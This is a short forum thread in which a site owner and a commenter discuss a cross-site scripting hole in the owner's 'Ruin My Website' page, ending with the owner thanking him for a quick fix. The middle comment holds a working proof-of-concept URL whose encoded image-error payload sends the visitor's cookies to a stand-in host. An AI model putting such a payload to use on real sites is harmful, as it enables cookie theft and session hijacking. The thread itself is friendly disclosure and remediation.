comment by StJohn
StJohn  ·  3573 days ago  ·  link  ·    ·  parent  ·  post: Ruin My Website

I think that's a little bit dramatic. For a start I don't think there's anything people could get their hands on -- as far as I'm aware there are no cookies on my site. The only dynamic content at all is from that wee Twitter iframe.

If you have a proof of concept attack, I'd love to see it -- and to think about a solution. Are you talking about the risk of someone injecting JS code into the website via a link and inducing me to click on it? I could update the JS to escape the URL parameters before performing the replace..
acyclicks  ·  3573 days ago  ·  link  ·  

Yeah, I was thinking of someone injecting some JS code into a link, and getting you to click on it. If you have no dynamic content on the domain, then you should be safe. Also I can't imagine anyone would normally bother; I just genuinely found the title+exploit combination funny.

POC:

https://www.fuzzjunket.com/ruin-my-website/?October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27//example.com/%27%20%2B%20document.cookie;%22%20/%3E

Html encoding the string before doing the replacement should fix it if you can be bothered.

Pseudo-edit: Just saw you already pushed a fix. That was fast. The POC did work before the fix.

---
StJohn  ·  3573 days ago  ·  link  ·  

Oooh, thank you! I'm aware inviting the Internet to ruin my site is probably like poking a sleeping dragon, but I try to stay on top of any security risks and I'm always glad to get pointers. I figured any injection attacks couldn't affect anyone but the person viewing the website, but I hadn't considered anyone trying to hook me with their nefarious schemes. The cheek. "Infamy! Infamy! They've all got it in for me!"

---